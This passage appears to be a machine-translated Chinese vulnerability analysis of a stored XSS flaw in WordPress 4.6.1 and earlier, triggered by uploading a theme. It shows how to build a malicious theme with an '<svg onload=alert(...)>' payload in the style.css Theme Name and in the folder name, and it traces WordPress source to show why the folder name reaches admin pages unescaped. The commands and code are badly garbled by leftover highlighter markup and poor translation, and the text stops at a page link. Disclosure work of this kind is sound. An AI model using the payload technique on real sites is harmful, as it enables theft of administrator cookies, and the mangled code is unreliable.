WordPress <= 4.6.1 use the theme file to trigger stored XSS vulnerability analysis-vulnerability warning-the black bar safety net

2016-10-16T00:00:00
ID MYHACK58:62201680196
Type myhack58
Reporter 佚名
Modified 2016-10-16T00:00:00

Description

Author: p0wd3r (know Chong Yu 4 0 4 Security lab) Date: 2016-10-08

0x00 vulnerability overview

1. Vulnerability description

WordPress is a PHP and MySQL as a platform free and open source blogging software and content management systems, recently researchers found that in their<=4.6.1 version, by uploading a malicious configuration of the theme files can trigger a back-end storage typeXSSvulnerabilities. Through this vulnerability, an attacker may be able to upload the theme files under the premise of the implementation to obtain an administrator Cookie and other sensitive operations.

2. Vulnerability

In able to upload the theme files under the premise of the implementation to obtain an administrator Cookie and otherXSScan be carried out the attack, the actual attack scenarios the following two ways:

  • The attacker would induce the administrator to upload a malicious configuration of the theme files, and administrator and not to the file to be checked
  • An attacker with administrator privileges can directly upload the theme files, but since it already has administrator privileges, then such an attack is also uncalled for.

3. Impact version

<= 4.6.1

0x01 vulnerability reproduction

1. Environment to build

dockerpullwordpress<spanclass="token punctuation">:</span><spanclass="token number">4.6</span><spanclass="token punctuation">.</ span><spanclass="token number">1</span> dockerpullmysql dockerrun <spanclass="token operator">--</span>namewp<spanclass="token operator">-</span>mysql <spanclass="token operator">-</span>e MYSQL_ROOT_PASSWORD<spanclass="token operator">=</span>hellowp <spanclass="token operator">-</span>e MYSQL_DATABASE<spanclass="token operator">=</span>wp <spanclass="token operator">-</span>d mysql dockerrun <spanclass="token operator">--</span>namewp <spanclass="token operator">--</span>linkwp<spanclass="token operator">-</span>mysql<spanclass="token punctuation">:</span>mysql <spanclass="token operator">-</span>d wordpress

2. Vulnerability analysis

We'll just download a theme:

wgethttps<spanclass="token punctuation">:</span><spanclass="token operator">/</span><spanclass="token operator">/</span>downloads<spanclass="token punctuation">.</ span>wordpress<spanclass="token punctuation">.</ span>org<spanclass="token operator">/</span>theme<spanclass="token operator">/</span>illdy<spanclass="token number">.1</span><spanclass="token punctuation">.</ span><spanclass="token number">0.29</span><spanclass="token punctuation">.</ span>zip unzip <spanclass="token operator">-</span>x illdy<spanclass="token number">.1</span><spanclass="token punctuation">.</ span><spanclass="token number">0.29</span><spanclass="token punctuation">.</ span>zip

Then illdy/style. css be changed as follows:

<spanclass="token comment">/ Theme Name: <svg onload=alert(1 2 3 4)> ... DO NOT CHANGES HERE ... /</span>

Then change the folder name then package:

mvilldy <spanclass="token string">"<svg onload=alert(5 6 7 8)>"</span> zip <spanclass="token operator">-</span>r theme<spanclass="token punctuation">.</ span>zip <spanclass="token string">"<svg onload=alert(5 6 7 8)>"</span>

Constructed after we login to the backend to upload the theme file, while the start of dynamic debugging.

The first to enter the wp-admin/includes/class-theme-installer-skin.php 5 5-8 2 line:

<spanclass="token variable">$name</span> <spanclass="token operator">=</span> <spanclass="token variable">$theme_info</span><spanclass="token operator">-</span><spanclass="token operator">></span><spanclass="token function">display<spanclass="token punctuation">(</span></span><spanclass="token string">'Name'</span><spanclass="token punctuation">) </span><spanclass="token punctuation">;</span> <spanclass="token punctuation">.</ span><spanclass="token punctuation">.</ span><spanclass="token punctuation">.</ span>

<spanclass="token keyword">if</span> <spanclass="token punctuation">(</span> <spanclass="token function">current_user_can<spanclass="token punctuation">(</span></span> <spanclass="token string">'edit_theme_options'</span> <spanclass="token punctuation">) </span> <spanclass="token operator">&&</span> <spanclass="token function">current_user_can<spanclass="token punctuation">(</span></span> <spanclass="token string">'customize'</span> <spanclass="token punctuation">)</span> <spanclass="token punctuation">)</span> <spanclass="token punctuation">{</span> <spanclass="token variable">$install_actions</span><spanclass="token punctuation">[</span><spanclass="token string">'preview'</span><spanclass="token punctuation">] </span> <spanclass="token operator">=</span> '<span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>a</span> <span class="token attr-name">href</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>' . wp_customize_url( $stylesheet ) . '<span class="token punctuation">"</span></span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>hide-if-no-customize load-customize<span class="token punctuation">"</span></span><span class="token punctuation">></span></span> </span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>span</span> <span class="token attr-name">aria-hidden</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>true<span class="token punctuation">"</ span></span><span class="token punctuation">></span></span></span><span class="token string">' . ( '</span>Live Preview<span class="token string">' ) . '</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>span</span><span class="token punctuation">></span></span></span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>span</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>screen-reader-text span<span class="token punctuation">"</span></span><span class="token punctuation">></span></span></span><span class="token string">' . sprintf( ( '</span>Live Preview <span class="token operator">&</span>#<span class="token number">8 2 2 0</span><span class="token punctuation">;</span><span class="token operator">%</span>s<span class="token operator">&</span>#<span class="token number">8 2 2 1</span><span class="token punctuation">; </span><span class="token string">' ), $name ) . '</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>span</span><span class="token punctuation">></span></span></span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>a</ span><span class="token punctuation">></span></span></span>'<spanclass="token punctuation">;</span> <spanclass="token punctuation">}</span> <spanclass="token variable">$install_actions</span><spanclass="token punctuation">[</span><spanclass="token string">'activate'</span><spanclass="token punctuation">] </span> <spanclass="token operator">=</span> '<span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>a</span> <span class="token attr-name">href</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>' . esc_url( $activate_link ) . '<span class="token punctuation">"</span></span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>activatelink<span class="token punctuation">"</span></span><span class="token punctuation">></span></span></span><span class=" token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>span</span> <span class="token attr-name">aria-hidden</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>true<span class="token punctuation">"</span></span>< span class="token punctuation">></span></span></span><span class="token string">' . ( '</span>Activate<span class="token string">' ) . '</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>span</span><span class="token punctuation">></span></span></span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"><</span>span</span> <span class="token attr-name">class</span><span class="token attr-value"><span class="token punctuation">=</span><span class="token punctuation">"</span>screen-reader-text span<span class="token punctuation">"</span></span><span class="token punctuation">></span></span></span><span class="token string">' . sprintf( ( '</span>Activate <span class="token operator">&</span>#<span class="token number">8 2 2 0</span><span class="token punctuation">;</span><span class="token operator">%</span>s<span class="token operator">&</span>#<span class="token number">8 2 2 1</span><span class="token punctuation">; </span><span class="token string">' ), $name ) . '</span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>span</span><span class="token punctuation">></span></span></span><span class="token markup"><span class="token tag"><span class="token tag"><span class="token punctuation"></</span>a</ span><span class="token punctuation">></span></span></span>'<spanclass="token punctuation">;</span>

Where $theme_info the values are as follows:

!

Wherein the stylesheet and template values as we change the folder name, headers. Name to change the style. css in the Name. $theme_info in there we can control the payload, it calls the display function after assignment to $name, $name directly with the html splice, so the key point in the display function, dynamic commissioning up to wp-includes/class-wp-theme.php Article 6 3 0-6 4 6 line:

<spanclass="token keyword">public</span> <spanclass="token keyword">function</span> <spanclass="token function">display<spanclass="token punctuation">(</span></span> <spanclass="token variable">$header</span><spanclass="token punctuation">, </span> <spanclass="token variable">$markup</span> <spanclass="token operator">=</span> <spanclass="token boolean">true</span><spanclass="token punctuation">,</span> <spanclass="token variable">$translate</span> <spanclass="token operator">=</span> <spanclass="token boolean">true</span> <spanclass="token punctuation">) </span> <spanclass="token punctuation">{</span> <spanclass="token variable">$value</span> <spanclass="token operator">=</span> <spanclass="token this">$this</span><spanclass="token operator">-</span><spanclass="token operator">></span><spanclass="token function">get<spanclass="token punctuation">(</span></span> <spanclass="token variable">$header</span> <spanclass="token punctuation">) </span><spanclass="token punctuation">;</span> <spanclass="token keyword">if</span> <spanclass="token punctuation">(</span> <spanclass="token boolean">false</span> <spanclass="token operator">===</span> <spanclass="token variable">$value</span> <spanclass="token punctuation">)</span> <spanclass="token punctuation">{</span> <spanclass="token keyword">return</span> <spanclass="token boolean">false</span><spanclass="token punctuation">;</span> <spanclass="token punctuation">}</span>

<spanclass="token keyword">if</span> <spanclass="token punctuation">(</span> <spanclass="token variable">$translate</span> <spanclass="token operator">&&</span> <spanclass="token punctuation">(</span> <spanclass="token function">empty<spanclass="token punctuation">(</span></span> <spanclass="token variable">$value</span> <spanclass="token punctuation">) </span> <spanclass="token operator">||</span> <spanclass="token operator">!</ span> <spanclass="token this">$this</span><spanclass="token operator">-</span><spanclass="token operator">></span><spanclass="token function">load_textdomain<spanclass="token punctuation">(</span></span><spanclass="token punctuation">)</span> <spanclass="token punctuation">)</span> <spanclass="token punctuation">)</span> <spanclass="token variable">$translate</span> <spanclass="token operator">=</span> <spanclass="token boolean">false</span><spanclass="token punctuation">;</span>

<spanclass="token keyword">if</span> <spanclass="token punctuation">(</span> <spanclass="token variable">$translate</span> <spanclass="token punctuation">)</span> <spanclass="token variable">$value</span> <spanclass="token operator">=</span> <spanclass="token this">$this</span><spanclass="token operator">-</span><spanclass="token operator">></span><spanclass="token function">translate_header<spanclass="token punctuation">(</span></span> <spanclass="token variable">$header</span><spanclass="token punctuation">,</span> <spanclass="token variable">$value</span> <spanclass="token punctuation">)</span><spanclass="token punctuation">;</span>

<spanclass="token keyword">if</span> <spanclass="token punctuation">(</span> <spanclass="token variable">$markup</span> <spanclass="token punctuation">)</span> <spanclass="token variable">$value</span> <spanclass="token operator">=</span> <spanclass="token this">$this</span><spanclass="token operator">-</span><spanclass="token operator">></span><spanclass="token function">markup_header<spanclass="token punctuation">(</span></span> <spanclass="token variable">$header</span><spanclass="token punctuation">, </span> <spanclass="token variable">$value</span><spanclass="token punctuation">,</span> <spanclass="token variable">$translate</span> <spanclass="token punctuation">)</span><spanclass="token punctuation">;</span>

<spanclass="token keyword">return</span> <spanclass="token variable">$value</span><spanclass="token punctuation">;</span> <spanclass="token punctuation">}</span>

By before the call can be seen, where the $header value for Name. First look at the $this-get($header), in wp-includes/class-wp-theme.php 5 9 4-6 1 7 line:

<spanclass="token keyword">public</span> <spanclass="token keyword">function</span> <spanclass="token function">get<spanclass="token punctuation">(</span></span> <spanclass="token variable">$header</span> <spanclass="token punctuation">)</span> <spanclass="token punctuation">{</span> <spanclass="token punctuation">.</ span><spanclass="token punctuation">.</ span><spanclass="token punctuation">.</ span> <spanclass="token this">$this</span><spanclass="token operator">-</span><spanclass="token operator">></span><spanclass="token property">headers_sanitized</span><spanclass="token punctuation">[</span> <spanclass="token variable">$header</span> <spanclass="token punctuation">] </span> <spanclass="token operator">=</span> <spanclass="token this">$this</span><spanclass="token operator">-</span><spanclass="token operator">></span><spanclass="token function">sanitize_header<spanclass="token punctuation">(</span></span> <spanclass="token variable">$header</span><spanclass="token punctuation">, </span> <spanclass="token this">$this</span><spanclass="token operator">-</span><spanclass="token operator">></span><spanclass="token property">headers</span><spanclass="token punctuation">[</span> <spanclass="token variable">$header</span> <spanclass="token punctuation">]</span> <spanclass="token punctuation">)</span><spanclass="token punctuation">; </span> <spanclass="token punctuation">.</ span><spanclass="token punctuation">.</ span><spanclass="token punctuation">.</ span> <spanclass="token keyword">return</span> <spanclass="token this">$this</span><spanclass="token operator">-</span><spanclass="token operator">></span><spanclass="token property">headers_sanitized</span><spanclass="token punctuation">[</span> <spanclass="token variable">$header</span> <spanclass="token punctuation">]</span><spanclass="token punctuation">;</span> <spanclass="token punctuation">}</span>

Here is omitted and the vulnerability-independent part, the program proceeds to the $this->sanitize_header, in wp-includes/class-wp-theme.php 6 6 1-7 0 5 line:

<spanclass="token keyword">private</span> <spanclass="token keyword">function</span> <spanclass="token function">sanitize_header<spanclass="token punctuation">(</span></span> <spanclass="token variable">$header</span><spanclass="token punctuation">,</span> <spanclass="token variable">$value</span> <spanclass="token punctuation">)</span> <spanclass="token punctuation">{</span> <spanclass="token keyword">switch</span> <spanclass="token punctuation">(</span> <spanclass="token variable">$header</span> <spanclass="token punctuation">)</span> <spanclass="token punctuation">{</span> <spanclass="token punctuation">.</ span><spanclass="token punctuation">.</ span><spanclass="tokenpunctuation">.</ span> <spanclass="token keyword">case</span> <spanclass="token string">'Name'</span> <spanclass="token punctuation">:</span> <spanclass="token keyword">static</span> <spanclass="token variable">$header_tags</span> <spanclass="token operator">=</span> <spanclass="token keyword">array</span><spanclass="token punctuation">(</span> <spanclass="token string">'abbr'</span> <spanclass="token operator">=</span><spanclass="token operator">></span> <spanclass="token keyword">array</span><spanclass="token punctuation">(</span> <spanclass="token string">'title'</span> <spanclass="token operator">=</span><spanclass="token operator">></span> <spanclass="token boolean">true</ span> <spanclass="token punctuation">)</span><spanclass="token punctuation">,</span> <spanclass="token string">'acronym'</span> <spanclass="token operator">=</span><spanclass="token operator">></span> <spanclass="token keyword">array</span><spanclass="token punctuation">(</span> <spanclass="token string">'title'</span> <spanclass="token operator">=</span><spanclass="token operator">></span> <spanclass="token boolean">true</ span> <spanclass="token punctuation">)</span><spanclass="token punctuation">,</span> <spanclass="token string">'code'</span> <spanclass="token operator">=</span><spanclass="token operator">></span> <spanclass="token boolean">true</span><spanclass="token punctuation">,</span> <spanclass="token string">'em'</span> <spanclass="token operator">=</span><spanclass="token operator">></span> <spanclass="token boolean">true</span><spanclass="token punctuation">,</span> <spanclass="token string">'strong'</span> <spanclass="token operator">=</span><spanclass="token operator">></span> <spanclass="token boolean">true</span><spanclass="token punctuation">,</span> <spanclass="token punctuation">)</span><spanclass="token punctuation">;</span> <spanclass="token variable">$value</span> <spanclass="token operator">=</span> <spanclass="token function">wp_kses<spanclass="token punctuation">(</span></span> <spanclass="token variable">$value</span><spanclass="token punctuation">,</span> <spanclass="token variable">$header_tags</span> <spanclass="token punctuation">)</span><spanclass="token punctuation">; </span> <spanclass="token keyword">break</span><spanclass="token punctuation">;</span> <spanclass="token punctuation">.</ span><spanclass="token punctuation">.</ span><spanclass="token punctuation">.</ span> <spanclass="token punctuation">}</span>

Performed here by the Name of this branch, you can see the program using wp_kses the $value is the value for a filter, allowing only $header_tags of html symbols, so we headers. The value of Name <svg onload=alert(1 2 3 4)> is not legal, the $value the value to be assigned is empty.

Then the program returns to the display function, according to the dynamic debugging can be know the program executing $value = $this->markup_header( $header, $value, $translate ); this conditional branch, and then follow up, in wp-includes/class-wp-theme.php Article 7 2 0-7 4 8:

<spanclass="token keyword">private</span> <spanclass="token keyword">function</span> <spanclass="token function">markup_header<spanclass="token punctuation">(</span></span> <spanclass="token variable">$header</span><spanclass="token punctuation">,</span> <spanclass="token variable">$value</span><spanclass="token punctuation">, </span> <spanclass="token variable">$translate</span> <spanclass="token punctuation">)</span> <spanclass="token punctuation">{</span> <spanclass="token keyword">switch</span> <spanclass="token punctuation">(</span> <spanclass="token variable">$header</span> <spanclass="token punctuation">)</span> <spanclass="token punctuation">{</span> <spanclass="token keyword">case</span> <spanclass="token string">'Name'</span> <spanclass="token punctuation">:</span> <spanclass="token keyword">if</span> <spanclass="token punctuation">(</span> <spanclass="token function">empty<spanclass="token punctuation">(</span></span> <spanclass="token variable">$value</span> <spanclass="token punctuation">)</span> <spanclass="token punctuation">)</span><spanclass="token variable">$value</span> <spanclass="token operator">=</span> <spanclass="token this">$this</span><spanclass="token operator">-</span><spanclass="token operator">></span><spanclass="token function">get_stylesheet<spanclass="token punctuation">(</span></span><spanclass="token punctuation">)</span><spanclass="token punctuation">;</span> <spanclass="token keyword">break</span><spanclass="token punctuation">;</span> <spanclass="token punctuation">.</ span><spanclass="token punctuation">.</ span><spanclass="token punctuation">.</ span> <spanclass="token keyword">return</span> <spanclass="token variable">$value</span><spanclass="token punctuation">;</span> <spanclass="token punctuation">}</span>

[1] [2] next